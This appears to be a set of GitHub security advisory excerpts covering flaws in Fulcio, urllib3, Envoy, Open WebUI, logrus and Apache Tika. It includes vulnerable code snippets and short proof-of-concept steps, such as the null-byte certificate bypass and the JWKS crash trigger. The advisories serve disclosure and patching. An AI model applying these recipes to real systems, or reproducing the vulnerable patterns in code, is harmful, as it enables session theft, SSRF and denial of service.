Source
ghsa
Function [identity.extractIssuerURL](https://github.com/sigstore/fulcio/blob/main/pkg/identity/issuerpool.go#L44-L45) currently splits (via a call to [strings.Split](https://pkg.go.dev/strings#Split)) its argument (which is untrusted data) on periods. As a result, in the face of a malicious request with an (invalid) OIDC identity token in the payload containing many period characters, a call to `extractIssuerURL` incurs allocations to the tune of O(n) bytes (where n stands for the length of the function's argument), with a constant factor of about 16. Relevant weakness: [CWE-405: Asymmetric Resource Consumption (Amplification)](https://cwe.mitre.org/data/definitions/405.html) Details See [identity.extractIssuerURL](https://github.com/sigstore/fulcio/blob/main/pkg/identity/issuerpool.go#L44-L45) Impact Excessive memory allocation
### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requ...
## Impact urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`). However, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. ## Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly. ## Remediation Upgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5. If upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers["content-encoding"]` contains a safe number of encodings before reading the response content.
### Summary Envoy’s mTLS certificate matcher for `match_typed_subject_alt_names` may incorrectly treat certificates containing an embedded null byte (\0) inside an `OTHERNAME` SAN value as valid matches. ### Details This occurs when the SAN is encoded as a `BMPSTRING` or `UNIVERSALSTRING`, and its UTF-8 conversion result is truncated at the first null byte during string assignment. As a result, `"victim\0evil"` may match an exact: `"victim"` rule and be accepted by Envoy. ### PoC Create a CA and a server certificate signed by that CA. Create two client certificates signed by the same CA: client_evil with OTHERNAME BMPSTRING = "evil" client_null with OTHERNAME BMPSTRING = "victim\0evil" Configure Envoy with require_client_certificate: true and a match_typed_subject_alt_names entry for the OTHERNAME OID with matcher.exact: "victim". Connect without a client cert → connection rejected. Connect with client_evil → connection rejected. Connect with client_null → connection accepted (but s...
## Summary Forwarding of early CONNECT data in TCP proxy mode. ## Details Per [RFC 7231-4.3.6](https://www.rfc-editor.org/rfc/rfc7231#section-4.3.6) the sender of CONNECT (and all inbound proxies) switch to tunnel mode only after receiving 2xx response. However in TCP proxy mode, Envoy accepts client data before it has issued a 2xx response and eagerly proxies it to an established TCP connection. This creates possibility of a de-synchronized tunnel state if a proxy upstream from Envoy responds with a status other an 2xx. The RFC does not specify the behavior in case an early CONNECT data is received and early CONNECT data is common as a latency reduction mechanism. To prevent disruption to existing deployments Envoy will by default allow early CONNECT data. Setting the `envoy.reloadable_features.reject_early_connect_data` runtime flag to `true` will cause CONNECT requests that send data before 2xx response to be rejected. This options should be enabled if there are intermediaries ...
### Summary Envoy crashes when JWT authentication is configured with the remote JWKS fetching, `allow_missing_or_failed` is enabled, multiple JWT tokens are present in the request headers and the JWKS fetch fails. ### Details This is caused by a re-entry bug in the `JwksFetcherImpl`. When the first token's JWKS fetch fails, `onJwksError()` callback triggers processing of the second token, which calls fetch() again on the same fetcher object. The original callback's reset() then clears the second fetch's state (`receiver_ and request_`) which causes a crash when the async HTTP response arrives. ### PoC * `allow_missing_or_failed` or `allow_missing` is enabled * The client send 2 Authorization headers * the remote JWKS fetching failed * There will be crash ### Impact DoS and Crash ### Mitigation * Disable the `allow_missing_or_failed` or `allow_missing`
## Summary A **Stored XSS vulnerability** has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to **execute arbitrary JavaScript code** and **steal session tokens** when a victim downloads the note as PDF. This vulnerability can be exploited by **any authenticated user**, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files. ## Details ### Vulnerability Location **File:** `src/lib/components/notes/utils.ts` **Function:** `downloadPdf()` **Vulnerable Code (Line 35):** ```typescript const contentNode = document.createElement('div'); contentNode.innerHTML = html; // Direct assignment without DOMPurify sanitization node.appendChild(contentNode); document.body.appendChild(node); ``` ### Root Cause 1. **Incomplete TipTap Editor Configuration** - Open-WebUI only uses ...
### Summary A Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. ### Details The vulnerability exists in the /api/v1/retrieval/process/web endpoint located in backend/open_webui/routers/retrieval.py at lines 1758-1767. Vulnerable code: @router.post("/process/web") def process_web( request: Request, form_data: ProcessUrlForm, user=Depends(get_verified_user) ): try: collection_name = form_data.collection_name if not collection_name: collection_name = calculate_sha256_string(form_data.url)[:63] content, docs = get_content_from_url(request, form_data.url) # ← SSRF vulnerability Th...
A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with "token too long" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged.
Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module.